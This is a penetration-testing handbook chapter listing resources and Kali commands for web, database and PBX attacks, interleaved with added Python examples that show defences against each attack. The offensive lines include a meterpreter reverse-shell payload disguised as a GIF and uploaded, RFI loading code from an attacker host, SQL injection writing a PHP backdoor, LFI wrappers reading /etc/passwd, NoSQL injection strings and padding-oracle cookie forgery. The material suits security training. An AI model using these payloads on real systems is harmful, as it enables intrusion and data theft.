
Chapter 3 - Exploiting Vulnerabilities

That was the division in the hacking world: There were people who were exploring it and the people who were trying to make money from it. And, generally, you stayed away from anyone who was trying to make money from it.

— Jeff Moss

Finding Exploits

Search Exploit-DB
Kali> searchsploit windows 2003 | grep -i local
Search Google

Google> site:exploit-db.com exploit kernel <= 3

Search Metasploit
Kali> grep -R "W7" /usr/share/metasploit-framework/modules/exploits/windows/*
Search Vulners

Vulners Audit

Compiling Exploits

Compile for Windows
Kali> i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
Compile for Architectures
Kali> gcc -m32 -o output32 hello.c (32 bit)
Kali> gcc -m64 -o output hello.c (64 bit)

Breaking out of Virtualization

Breaking into the Data Centre

VENOM Vulnerability

WebSockets

Hacking with WebSockets HTML5

IPV6

Penetration testing with IPv6

How to pwn things with IPv6

HTTP

Resources

OWASP AppSec Videos

OWASP Testing Guide

Cracking the Lens: Attacking HTTP's hidden attack surface

How I hacked hundreds of companies through their helpdesk

Headers
Send fake IP
Kali> curl --header "X-Forwarded-For: 192.168.1.1" http://$TARGET
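X-Forwarded-For is a plain request header, so the curl above shows it can carry any value the client chooses. The added example below (not from the page) contrasts the usual mistake of believing the header with a version that only consults it when the TCP peer is a known reverse proxy, walking the chain from the right to the first hop that is not ours. TRUSTED_PROXIES and the sample requests are constructed values.

```python
"""Client IP derivation with and without trusting X-Forwarded-For. Added
example, not the page's code; TRUSTED_PROXIES and the sample requests are
constructed values."""
import ipaddress

# Assumption: these are the only hops that may legitimately append to the header.
TRUSTED_PROXIES = {"10.0.0.1", "10.0.0.2"}


def naive_client_ip(remote_addr, xff):
    """The common bug: prefer the header whenever it is present. Any client can
    send X-Forwarded-For, so this value is chosen by the sender."""
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip(remote_addr, xff, trusted=TRUSTED_PROXIES):
    """Consult the header only when the TCP peer is a trusted proxy, then walk
    the chain from the right and return the first hop that is not one of ours.
    Returns None when the chain is malformed or contains no untrusted hop."""
    if remote_addr not in trusted:
        return remote_addr              # direct client: the header is only a claim
    hops = [h.strip() for h in (xff or "").split(",") if h.strip()]
    if not hops:
        return remote_addr              # proxy forwarded nothing; attribute to it
    for hop in reversed(hops):
        try:
            ipaddress.ip_address(hop)   # every hop must be a literal address
        except ValueError:
            return None                 # garbage in the chain: do not attribute
        if hop not in trusted:
            return hop
    return None                         # chain consists only of our own proxies


if __name__ == "__main__":
    # Constructed request: client 203.0.113.5 connects directly and forges the header.
    print(naive_client_ip("203.0.113.5", "192.168.1.1"))   # 192.168.1.1 (spoofed)
    print(client_ip("203.0.113.5", "192.168.1.1"))         # 203.0.113.5 (real peer)
    # Constructed request: arrives via trusted proxy 10.0.0.1 with a forged prefix.
    print(client_ip("10.0.0.1", "192.168.1.1, 198.51.100.7"))  # 198.51.100.7
```

Anything keyed on the client address (rate limits, allow-lists, audit logs) should use the second function, and the edge proxy should overwrite or strip an inbound X-Forwarded-For rather than append to it.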
XXE
Resources

Exploitation: XML External Entity XXE Injection

Exploiting a Real-World XXE Vulnerability

Exploiting XXE Vulnerabilities in file parsing

XSS
Resources

XSS Attack: Busting browsers to root

DOM Clobbering

DOM Flow - Untangling the DOM

CORS

Resources

Exploiting Misconfigured CORS

CSRF
Resources

Computerphile: Cross Site Request Forgery

Updating Anti-CSRF Tokens with BurpSuite

SSRF
Resources

What is Server side Request Forgery?

A New Era of SSRF

Exploiting Server Side Request Forgery on a Node/Express Application hosted on Amazon EC2

Example

Sometimes what appears to be RFI can lead to SSRF; here are some commands to help.

# Port scan the internal resources available
Kali> wfuzz -c -z range,1-65535 --filter "l>2" http://$TARGET/proxy.php?path=localhost:FUZZ

# If you find one, dirbust it.
Kali> wfuzz -c -w /usr/share/wordlists/dirb/big.txt --filter "l>11" http://$TARGET:8080/FUZZ
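The proxy.php?path= pattern above works because the server fetches whatever host the parameter names. The added example below (not the page's code) is the server-side check that closes that off: it accepts only http(s), refuses credentials in the URL, resolves the host and rejects any address that is loopback, private, link-local or otherwise non-routable. FAKE_DNS and resolve_fake are a constructed stand-in for DNS so the demo runs offline; in production the real resolver is used.

```python
"""Allow-listing outbound fetches so a proxy/path parameter cannot be pointed
at internal services. Added example, not the page's code; FAKE_DNS is a
constructed resolver used so the demo runs offline."""
import ipaddress
import socket
from urllib.parse import urlsplit


def resolve_with_system_dns(host):
    """Real resolver: every address the name maps to (A and AAAA)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


# Constructed lookup table standing in for DNS (assumed values, not real records).
FAKE_DNS = {
    "example.com": {"93.184.216.34"},
    "localhost": {"127.0.0.1", "::1"},
    "db.internal": {"10.0.3.7"},
}


def resolve_fake(host):
    try:
        return {str(ipaddress.ip_address(host))}   # literal IPs resolve to themselves
    except ValueError:
        return FAKE_DNS[host]                      # KeyError for unknown names


def is_public(addr):
    ip = ipaddress.ip_address(addr)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_outbound_url(url, resolve=resolve_with_system_dns):
    """Return (allowed, reason). Scheme must be http(s), no credentials in the
    URL, and every address the host resolves to must be publicly routable."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    try:
        addrs = resolve(host)
    except (socket.gaierror, KeyError):
        return False, f"cannot resolve {host}"
    for addr in addrs:
        if not is_public(addr):
            return False, f"{host} resolves to non-public {addr}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("http://example.com/data", "http://localhost:8080/",
                      "http://169.254.169.254/", "file:///etc/passwd"):
        print(candidate, check_outbound_url(candidate, resolve=resolve_fake))
```

Two caveats a practitioner should carry over: the HTTP client must connect to the address that was vetted (resolving a second time at connect time reopens the hole), and redirects need the same check on each new location.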
RCE

Resources

Node.js Remote Code Execution as a Service

Exploiting Python code execution in the web

Big List of Naughty Strings

PHP Generic Gadget Chains

Utilizing Code Re-use or ROP in PHP Exploits

Pwning PHP Mail Function for fun and RCE

Server Side Template Injection

Resources

Server Side Template Injection

Server Side Template Injection: RCE for the Modern WebApp

API

Resources

Cracking & Fixing REST APIs

LFI
Resources

Local File Inclusion Testing Techniques

Insecure PHP Functions & their Exploits LFI/RFI

LFI and RFI -- The Website Security Vulnerability

Local File Inclusion to Remote Code Execution

Local File Inclusion to Remote Code Execution Advanced Exploitation PROC Shortcuts

Examples
file:///etc/passwd
../../../etc/passwd
php://filter/convert.base64-encode/resource=admin.php
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
php://input
    send post data
expect://whoami
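Every payload in the list above reaches the include call as a string, so the fix is in how that string is resolved. The added example below (not the page's code) decodes the parameter once, rejects null bytes and any wrapper or URL scheme (php://, expect://, file://, http://), normalises the path and refuses anything that climbs out of the include directory, then restricts the extension. BASE_DIR is an assumed web root; the inputs exercised are the payload shapes listed above.

```python
"""Resolving an include/page parameter safely. Added example, not the page's
code; BASE_DIR is an assumed web root."""
import posixpath
from urllib.parse import unquote

BASE_DIR = "/var/www/html/pages"      # assumption: only files under here may be included
ALLOWED_EXT = {".php", ".html"}


def resolve_include(user_path, base_dir=BASE_DIR):
    """Return (absolute_path, "ok") or (None, reason)."""
    raw = unquote(user_path).replace("\\", "/")    # decode once, then treat '\' as '/'
    if "\x00" in raw:
        return None, "null byte"
    if "://" in raw or raw.startswith("//"):
        return None, "stream wrapper or remote URL"   # php://, expect://, http:// ...
    norm = posixpath.normpath(raw)
    if posixpath.isabs(norm) or norm == ".." or norm.startswith("../"):
        return None, "path traversal"
    if posixpath.splitext(norm)[1].lower() not in ALLOWED_EXT:
        return None, "extension not allowed"
    full = posixpath.join(base_dir, norm)
    if posixpath.commonpath([base_dir, full]) != base_dir:   # belt and braces
        return None, "escapes base directory"
    return full, "ok"


if __name__ == "__main__":
    for candidate in ("about.php", "../../../etc/passwd",
                      "php://filter/convert.base64-encode/resource=admin.php",
                      "expect://whoami", "%2e%2e/%2e%2e/etc/passwd"):
        print(repr(candidate), "->", resolve_include(candidate))
```

A fixed map from page name to file is stronger still when the set of includable pages is known; the function above is for the case where a path really has to be accepted.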
Open Redirects
Resources

Open URL Redirects

RFI
Kali> echo "<?php phpinfo(); ?>" > evil.txt
http://$TARGET/index.php?path=http://$ATTACKER/evil.txt
Padding Oracle Attack
Resources

Automated Padding Oracle Attacks with Padbuster

Arguments
url - first argument is the URL
encrypted - second argument is the encrypted text
bits - third argument is the number of bits per block
-cookies - define a cookie to use
-plaintext - plaintext to encrypt
Examples
Kali> padBuster.pl http://$TARGET "ENC-COOKIE-TEXT" 8 \
        -cookies "ENC-COOKIE" \
        -plaintext '{"user":"admin","role":"admin"}'
AWS

Resources

AWS PENETRATION TESTING PART 1. S3 BUCKETS

File Upload
Make a backdoor GIF
# As a note, try to overwrite the magic bytes of your backdoor with a valid image
# so that the check will validate. This includes Content-Type.
Kali> msfvenom --list | grep php
Kali> msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.15.237 LPORT=54321 -o evil.php
Kali> echo "FFD8FFE0" | xxd -r -p > evil.gif
Kali> cat evil.php >> evil.gif
Upload From CLI
Kali> curl -X POST \
        -F "field1=test" \
        -F "file=@/home/user/evil.gif" \
        http://$TARGET/upload.php \
        --cookie "cookie"
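The note above says why a magic-byte or Content-Type check is not enough: both are satisfied by a few leading bytes. The added example below (not the page's code) is the upload-side check that is not fooled by that trick for GIFs: it walks the real block structure (header, colour tables, extensions, image descriptors, sub-blocks) and requires the file to end exactly at the 0x3B trailer, so anything appended after a valid image is rejected. MINIMAL_GIF is a constructed 1x1 image used as the clean sample.

```python
"""Structural check for GIF uploads: rather than trusting magic bytes or the
Content-Type, walk the GIF block structure and require the file to end exactly
at the trailer. Added example, not the page's code; MINIMAL_GIF is constructed."""
import struct


class InvalidGif(ValueError):
    pass


def _skip_sub_blocks(data, pos):
    """Advance over a chain of length-prefixed sub-blocks ending with a 0x00 byte."""
    while True:
        if pos >= len(data):
            raise InvalidGif("truncated sub-block chain")
        size = data[pos]
        pos += 1 + size
        if size == 0:
            return pos
        if pos > len(data):
            raise InvalidGif("truncated sub-block")


def validate_gif(data):
    """Return (width, height, frames) or raise InvalidGif."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        raise InvalidGif("bad signature")
    width, height, packed = struct.unpack_from("<HHB", data, 6)
    pos = 13
    if packed & 0x80:                       # global colour table present
        pos += 3 * (2 ** ((packed & 0x07) + 1))
    frames = 0
    while True:
        if pos >= len(data):
            raise InvalidGif("missing trailer")
        block, pos = data[pos], pos + 1
        if block == 0x3B:                   # trailer: end of image
            break
        if block == 0x21:                   # extension: label byte, then sub-blocks
            pos = _skip_sub_blocks(data, pos + 1)
        elif block == 0x2C:                 # image descriptor
            if pos + 9 > len(data):
                raise InvalidGif("truncated image descriptor")
            local_packed = data[pos + 8]
            pos += 9
            if local_packed & 0x80:         # local colour table present
                pos += 3 * (2 ** ((local_packed & 0x07) + 1))
            pos = _skip_sub_blocks(data, pos + 1)   # +1 skips the LZW min code size
            frames += 1
        else:
            raise InvalidGif(f"unknown block 0x{block:02x} at offset {pos - 1}")
    if frames == 0:
        raise InvalidGif("no image data")
    if pos != len(data):
        raise InvalidGif(f"{len(data) - pos} trailing byte(s) after trailer")
    return width, height, frames


def check_gif_upload(data):
    """Accept/reject verdict for an upload handler: (accepted, reason)."""
    try:
        w, h, n = validate_gif(data)
    except InvalidGif as e:
        return False, str(e)
    return True, f"{w}x{h} GIF, {n} frame(s)"


# Constructed sample: the smallest valid 1x1 GIF89a (global table, GCE, one frame).
MINIMAL_GIF = bytes.fromhex(
    "474946383961 0100 0100 80 00 00 000000 ffffff"
    "21 f9 04 01000000 00"
    "2c 0000 0000 0100 0100 00 02 02 4401 00"
    "3b"
)

if __name__ == "__main__":
    print(check_gif_upload(MINIMAL_GIF))                              # accepted
    print(check_gif_upload(MINIMAL_GIF + b"<?php phpinfo(); ?>"))     # trailing bytes
    print(check_gif_upload(b"\xff\xd8\xff\xe0" + b"<?php ?>"))        # bad signature
```

Structural validation is one layer; the others that make an appended script harmless are storing uploads outside the web root under a server-chosen name, serving them with a fixed image Content-Type, and re-encoding the image so only decoded pixels are kept.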

E-Mail

Resources

How to Bypass E-Mail gateways using common payloads

iSCSI

Resources

An interesting route to domain admin via ISCSI

Databases

MySQL
Resources

SQL Injection

SQLMap tricks for advanced SQL injection

Examples
username'--
1'||'1'<'2
'OR 1=1;--
'OR 1=1;#
'OR 1=1 LIMIT 1; #
AND 1 = 2 UNION SELECT 1,2,3,4,5
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl
1 union all select 1,2,3,4,load_file("/etc/passwd"),6
1 union all select 1,2,3,4,"<?php ?>",6 into outfile '/var/www/html/backdoor.php'
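The payloads above all rely on the input being spliced into SQL text. The added example below (not the page's code) puts the string-built query beside the parameterised one against an in-memory SQLite table, so the same `' OR 1=1 --` input can be seen to bypass the first and to be treated as a literal username by the second. The users table and its single row are constructed sample data.

```python
"""String-built SQL beside a parameterised query, run against an in-memory
SQLite table. Added example, not the page's code; the table contents are
constructed sample data."""
import sqlite3


def _db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return con


def vulnerable_login(username, password):
    """Vulnerable: user input becomes part of the SQL text, so a quote ends the
    literal and '--' comments out the password check."""
    con = _db()
    sql = f"SELECT 1 FROM users WHERE username = '{username}' AND password = '{password}'"
    return con.execute(sql).fetchone() is not None


def safe_login(username, password):
    """Hardened: placeholders let the driver pass the values separately from
    the statement, so quotes and comment markers are data, not syntax."""
    con = _db()
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    probe = "' OR 1=1 --"
    print("vulnerable:", vulnerable_login(probe, "anything"))   # True: bypassed
    print("safe:      ", safe_login(probe, "anything"))         # False: literal lookup
    print("safe real: ", safe_login("admin", "s3cret"))         # True
```

The same rule covers the load_file/into outfile payloads: with placeholders the input never reaches the parser as SQL, and the database account the application uses should not hold FILE privileges in the first place.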
MSSQL
Resources

PenTest & Hack MSSQL

SQL Injection Cheatsheet MSSQL

MongoDB
Resources

NoSQL Map

Examples
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
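Most of the payloads above fall into two groups: operator injection, where a value such as {$ne: 1} or the query-string form [$ne]=1 arrives as an object instead of a string, and $where/JavaScript injection, where user text is concatenated into a query string. The added example below (not the page's code) deals with the first group: it shows how bracket-style query parsing turns username[$ne]=1 into a nested object, then builds a login filter only when both credentials are plain strings and no `$`-prefixed key appears anywhere in the body. The request bodies are constructed samples and no MongoDB driver is needed.

```python
"""Rejecting MongoDB operator injection before a filter is built. Added
example, not the page's code; the request bodies are constructed samples."""
from urllib.parse import parse_qsl


def parse_bracket_qs(qs):
    """Emulate the body parsers (Express 'qs', PHP) that turn username[$ne]=1
    into {"username": {"$ne": "1"}}; one level of nesting is enough here."""
    out = {}
    for key, value in parse_qsl(qs, keep_blank_values=True):
        if key.endswith("]") and "[" in key:
            base, sub = key[:-1].split("[", 1)
            out.setdefault(base, {})[sub] = value
        else:
            out[key] = value
    return out


def contains_operator(value):
    """True if any key anywhere in a parsed body starts with '$'."""
    if isinstance(value, dict):
        return any(k.startswith("$") or contains_operator(v) for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False


def build_login_filter(body):
    """Return a Mongo filter only for plain-string credentials, else None.
    The type check is what stops {$gt: ''} or {$ne: 1} from acting as a query operator."""
    if contains_operator(body):
        return None
    user, pw = body.get("username"), body.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        return None
    return {"username": user, "password": pw}


if __name__ == "__main__":
    hostile = parse_bracket_qs("username[$ne]=1&password[$ne]=1")
    print(hostile, "->", build_login_filter(hostile))                     # None
    print(build_login_filter({"username": "admin", "password": {"$gt": ""}}))  # None
    print(build_login_filter(parse_bracket_qs("username=admin&password=s3cret")))
```

The `$where` payloads in the list are a different failure: they only work when the application concatenates user text into a JavaScript expression. Building filters as documents, as above, and not using `$where` with request data at all removes that path.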

PBX

Resources

Pentesting VOIP

Introduction to Telephony and PBX

Examples
Kali> svmap $TARGET
Kali> svwar -m INVITE -eSTART-END $TARGET